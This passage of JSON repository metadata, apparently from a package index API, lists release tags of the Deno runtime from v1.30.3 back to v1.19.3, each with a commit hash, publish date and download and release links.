oland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kin